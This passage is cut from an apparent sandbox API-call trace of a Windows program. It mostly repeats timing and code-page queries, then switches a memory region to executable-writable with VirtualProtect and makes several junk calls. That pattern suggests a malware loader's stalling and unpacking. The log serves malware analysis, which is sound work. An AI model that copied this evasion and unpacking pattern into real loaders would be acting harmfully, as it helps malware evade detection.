lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.494] GetACP () returned 0x4e4 [0043.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.494] GetACP () returned 0x4e4 [0043.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.494] GetACP () returned 0x4e4 [0043.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.494] GetACP () returned 0x4e4 [0043.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.494] GetACP () returned 0x4e4 [0043.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.494] GetACP () returned 0x4e4 [0043.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.494] GetACP () returned 0x4e4 [0043.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.495] GetACP () returned 0x4e4 [0043.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.495] GetACP () returned 0x4e4 [0043.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.495] GetACP () returned 0x4e4 [0043.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.495] GetACP () returned 0x4e4 [0043.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.495] GetACP () returned 0x4e4 [0043.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.495] GetACP () returned 0x4e4 [0043.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.495] GetACP () returned 0x4e4 [0043.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.500] GetACP () returned 0x4e4 [0043.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.500] GetACP () returned 0x4e4 [0043.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.501] GetACP () returned 0x4e4 [0043.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.501] GetACP () returned 0x4e4 [0043.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.501] GetACP () returned 0x4e4 [0043.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.501] GetACP () returned 0x4e4 [0043.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.501] GetACP () returned 0x4e4 [0043.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.501] GetACP () returned 0x4e4 [0043.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.501] GetACP () returned 0x4e4 [0043.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.501] GetACP () returned 0x4e4 [0043.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.501] GetACP () returned 0x4e4 [0043.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.501] GetACP () returned 0x4e4 [0043.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.502] GetACP () returned 0x4e4 [0043.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.502] GetACP () returned 0x4e4 [0043.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.502] GetACP () returned 0x4e4 [0043.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.502] GetACP () returned 0x4e4 [0043.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.502] GetACP () returned 0x4e4 [0043.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.502] GetACP () returned 0x4e4 [0043.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.502] GetACP () returned 0x4e4 [0043.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.502] GetACP () returned 0x4e4 [0043.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.502] GetACP () returned 0x4e4 [0043.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.503] GetACP () returned 0x4e4 [0043.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.503] GetACP () returned 0x4e4 [0043.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.503] GetACP () returned 0x4e4 [0043.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.503] GetACP () returned 0x4e4 [0043.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.503] GetACP () returned 0x4e4 [0043.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.503] GetACP () returned 0x4e4 [0043.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.503] GetACP () returned 0x4e4 [0043.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.503] GetACP () returned 0x4e4 [0043.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.503] GetACP () returned 0x4e4 [0043.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.504] GetACP () returned 0x4e4 [0043.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.504] GetACP () returned 0x4e4 [0043.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.504] GetACP () returned 0x4e4 [0043.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.504] GetACP () returned 0x4e4 [0043.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.504] GetACP () returned 0x4e4 [0043.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.504] GetACP () returned 0x4e4 [0043.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.504] GetACP () returned 0x4e4 [0043.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.504] GetACP () returned 0x4e4 [0043.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.504] GetACP () returned 0x4e4 [0043.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.505] GetACP () returned 0x4e4 [0043.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.505] GetACP () returned 0x4e4 [0043.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.505] GetACP () returned 0x4e4 [0043.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.505] GetACP () returned 0x4e4 [0043.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.505] GetACP () returned 0x4e4 [0043.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.505] GetACP () returned 0x4e4 [0043.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.505] GetACP () returned 0x4e4 [0043.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.505] GetACP () returned 0x4e4 [0043.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.505] GetACP () returned 0x4e4 [0043.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.506] GetACP () returned 0x4e4 [0043.506] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.506] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.506] GetACP () returned 0x4e4 [0043.506] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.506] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.506] GetACP () returned 0x4e4 [0043.506] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.506] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.506] GetACP () returned 0x4e4 [0043.506] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.506] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.506] GetACP () returned 0x4e4 [0043.506] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.506] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.506] GetACP () returned 0x4e4 [0043.788] VirtualProtect (in: lpAddress=0x295ab8, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0043.788] AddAtomA (lpString=0x0) returned 0x0 [0043.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.789] AddAtomA (lpString=0x0) returned 0x0 [0043.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.789] AddAtomA (lpString=0x0) returned 0x0 [0043.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.789] AddAtomA (lpString=0x0) returned 0x0 [0043.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.789] AddAtomA (lpString=0x0) returned 0x0 [0043.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.789] AddAtomA (lpString=0x0) returned 0x0 [0043.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.789] AddAtomA (lpString=0x0) returned 0x0 [0043.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.789] AddAtomA (lpString=0x0) returned 0x0 [0043.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.789] AddAtomA (lpString=0x0) returned 0x0 [0043.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.789] AddAtomA (lpString=0x0) returned 0x0 [0043.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.789] AddAtomA (lpString=0x0) returned 0x0 [0043.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.790] AddAtomA (lpString=0x0) returned 0x0 [0043.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: 